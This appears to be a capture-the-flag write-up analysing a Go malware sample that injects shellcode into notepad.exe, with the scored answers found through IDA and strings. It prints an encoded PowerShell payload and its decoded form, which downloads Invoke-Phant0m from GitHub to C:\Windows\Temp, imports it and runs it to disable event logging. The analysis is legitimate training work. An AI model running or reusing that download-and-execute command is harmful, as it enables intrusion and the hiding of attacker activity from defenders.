Reverse Engineering - Another Injection

Good morning everyone XD

Don’t ignore the warning .-.

What is the language the program is written? (1 points)

Can use IDA or PE studio, this time I will use IDA so I will guide you to use IDA pro to download and use

Please import the file and go to the Hex View-1

Go lang

What is the build id? (1 points)

eck19EyXq_9c975RxNJ1/QkbhfvYWoTcAeJreFwhX/q3HwQW17YdD3iMlLFCzB/1ZpNy-9ah0QEvzlOTFcq

What is the dependency package the sample uses for invoking windows APIs (1 points)

yes, that’s it .-.

github.com/TheTitanrain/w32

What is the victim process? (Hint: 32bit) (2 points)

Easy, right? :)

Nooooooo!!!, it took me all day just to realize it needs to launch itself or be injected. Yes, challenge title ;))))))))

strings main.exe | grep .exe

notepad.exe

What is the process invoked from the shellcode? (1 points)

What do you think about shellcode -> powershell

too fast XD

strings main.exe | grep powershell

powershell

What is the name of the created file? (2 points)

Go ahead, let’s get it decoded CyberChef

SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAGgAbABsAGQAegAvAEkAbgB2AG8AawBlAC0AUABoAGEAbgB0ADAAbQAvAG0AYQBzAHQAZQByAC8ASQBuAHYAbwBrAGUALQBQAGgAYQBuAHQAMABtAC4AcABzADEAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABjAGgAYQBuAGcAZQAuAHAAcwAxACIAOwAgAEkAbQBwAG8AcgB0AC0ATQBvAGQAdQBsAGUAIABDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAGMAaABhAG4AZwBlAC4AcABzADEAOwBJAG4AdgBvAGsAZQAtAFAAaABhAG4AdAAwAG0AOwA=

Now just remove the spaces

Invoke-WebRequest "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/master/Invoke-Phant0m.ps1" -OutFile "C:\Windows\Temp\change.ps1"; Import-Module C:\Windows\Temp\change.ps1;Invoke-Phant0m;

OK, got the answer ~

C:\Windows\Temp\change.ps1

What is the name of the actual tool executed? (2 points)

Invoke-Phant0m

goodbye, thank you for reading until now //~//